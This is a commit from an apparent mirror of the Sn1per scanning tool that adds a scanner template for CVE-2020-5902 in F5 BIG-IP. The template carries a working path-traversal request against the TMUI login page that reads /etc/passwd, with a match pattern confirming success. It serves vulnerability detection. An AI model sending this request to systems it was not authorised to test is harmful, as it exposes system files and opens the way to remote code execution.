mirror of https://github.com/1N3/Sn1per.git
* v8.6 - Added CVE-2020-5902 F5 BIG-IP RCE sc0pe template
This commit is contained in:
parent
7da27545a1
commit
527fb601e3
|
|
@ -0,0 +1,9 @@
|
|||
AUTHOR='@xer0dayz'
|
||||
VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 2'
|
||||
URI='/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
|
||||
METHOD='GET'
|
||||
MATCH="root\:"
|
||||
SEVERITY='P1 - CRITICAL'
|
||||
CURL_OPTS="--user-agent '' -s -L --insecure"
|
||||
SECONDARY_COMMANDS=''
|
||||
GREP_OPTIONS='-i'
|
||||
Loading…
Reference in New Issue